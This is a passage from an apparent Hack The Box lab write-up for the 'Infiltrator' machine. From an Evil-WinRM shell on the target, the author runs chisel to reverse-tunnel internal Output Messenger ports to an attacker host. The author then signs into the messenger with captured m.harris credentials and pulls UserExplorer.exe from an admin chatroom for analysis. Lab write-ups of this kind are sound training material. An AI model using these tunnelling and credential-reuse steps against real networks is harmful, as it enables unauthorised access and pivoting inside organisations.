Output Messenger Client Application


There is a dedicated client application available This was mentioned in the chat

Tunneling


Checking the documentation reveals the usage of those ports Additional Tunneling might be required in order to fully use the application

*Evil-WinRM* PS C:\Users\M.harris\Documents> .\chisel.exe client 10.10.14.136:9999 R:14121:127.0.0.1:14121 R:14122:127.0.0.1:14122 R:14123:127.0.0.1:14123 R:14124:127.0.0.1:14124 R:14125:127.0.0.1:14125
 
2024/09/02 07:26:04 client: Connecting to ws://10.10.14.136:9999
2024/09/02 07:26:04 client: Connected (Latency 20.115ms)

Port-forwarding 14121-5

Established

Linux


┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ sudo dpkg -i OutputMessenger_amd64.deb
[sudo] password for kali: 
Selecting previously unselected package outputmessenger.
(Reading database ... 456821 files and directories currently installed.)
Preparing to unpack OutputMessenger_amd64.deb ...
Unpacking outputmessenger (2.0.40) ...
Setting up outputmessenger (2.0.40) ...
Processing triggers for kali-menu (2024.3.1) ...
Processing triggers for desktop-file-utils (0.27-2) ...
Processing triggers for mailcap (3.72) ...

Installing the Linux client application

Testing out the credential of the m.harris user as it was mentioned in the post

Authentication successful While the interface appears rather similar to the web applciation, there is a chatroom with the admin user.

UserExplorer.exe


It contains the aforementioned program, UserExplorer.exe I will download it

It’s downloaded to the ~/Output Messenger/FBBB/Received Files/Feb 2024/ directory

┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ file UserExplorer.exe
UserExplorer.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

It’s a 32-bit Windows executable binary I will move this to a Windows host for decompilation

Windows (Wine (Failed))


┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ winetricks dotnet48
[...REDACTED...]

Installed .NET 4.8

Downloaded the Windows client of Output Messenger as suggested by the admin user

Server IP is set to the loopback address as all the necessary internal ports have been tunneled

Testing out the credential of the m.harris user as it was mentioned in the post

Successfully authenticated

It failed to load the chatrooms

It would appear that it’s unable to render the chatroom due to missing dependency; Wine Gecko It failed

Windows


I am unable to WinRM to the dc01 host from a Windows machine because Kerberos authentication is enforced. Thus, I would need to forward all those already-forwarded-ports from Kali to a Windows machine.

PS C:\Users\admin\Desktop> .\chisel server -p 8888 --reverse -v
2024/09/03 20:12:09 server: Reverse tunnelling enabled
2024/09/03 20:12:09 server: Fingerprint YA9kpDS0CWAvMPoG7aUuF+AqIvVaQNV1i9fRrW8mWzk=
2024/09/03 20:12:09 server: Listening on http://0.0.0.0:8888

Setting up a chisel server on a Windows machine; 10.1.1.19

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ chisel client 10.1.1.19:9999 R:14121:127.0.0.1:14121 R:14122:127.0.0.1:14122 R:14123:127.0.0.1:14123 R:14124:127.0.0.1:14124 R:14125:127.0.0.1:14125
 
2024/09/03 20:16:34 client: Connecting to ws://10.1.1.19:8888
2024/09/03 20:16:34 client: Connected (Latency 2.113308ms)

Forwarding all those already-forwarded-ports from Kali to a Windows machine.

Established

I already went ahead and installed the Windows client of Output Messenger

Signing in as the m.harris user

Successfully authenticated The same interface can be seen, including the UserExplorer.exe program Windows client is much more stable than the Linux client